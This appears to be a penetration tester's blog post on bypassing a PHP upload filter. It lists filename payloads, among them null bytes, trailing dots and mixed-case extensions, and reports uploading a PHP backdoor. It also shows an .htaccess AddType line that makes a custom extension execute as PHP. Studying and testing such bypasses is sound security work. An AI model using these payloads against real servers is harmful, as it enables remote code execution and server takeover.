Connect between .htaccess and file upload bypass

PHP File Upload Bypass

This blog contains the Information about the php file upload bypass and the role of .htaccess file in this bypass.

I came across a web application which had a upload function to upload the ticket into the application. The application was built using php and by doing further enumeration, I came across the uploads folder which contains the uploaded file. But the application had restricted me to upload any kind any potential file extensions listed below due to the validation.

[ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .phar and .inc ]

Bypass file extensions checks

I came across this nice article file-upload-bypass and made curated list of all bypasses to check via burp intruder and to see If anything passes through.

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png

Luckily the extension file.php… (3 dots after the filename) was able to bypass this file upload restriction and I could able to find the file.php inside the uploads directory. Now this confirmed the it was possible to bypass the file extension. I have tried to upload the simple php backdoor file which is by default available on kali machine.

Upload our simple php backdoor

Now it is straight forward and we could do the command execution by accessing this file from upload directory.

RCE via File Upload

Using .htaccess

It is found that users can upload .htaccess files. We can take advantage of this to get code execution. The .htaccess file is not an RCE vector by itself, but it allows the creation of new legitimate PHP extensions that are allowed by the web application.

Now we could create our own php extension and mention it via .htaccess file.

Now our .htaccess file looks like:


AddType application/x-httpd-php .rce

Now we could upload a file shell.rce which contains our simple-backdoor.php script and the .htaccess consider this as php file in that directory and now we could achieve the RCE same like before.

I found a nice article below to get more indepth analysis on the file-upload bypass. Definitely give a read here.

File-Upload Bypass https://thibaud-robin.fr/articles/bypass-filter-upload/
0%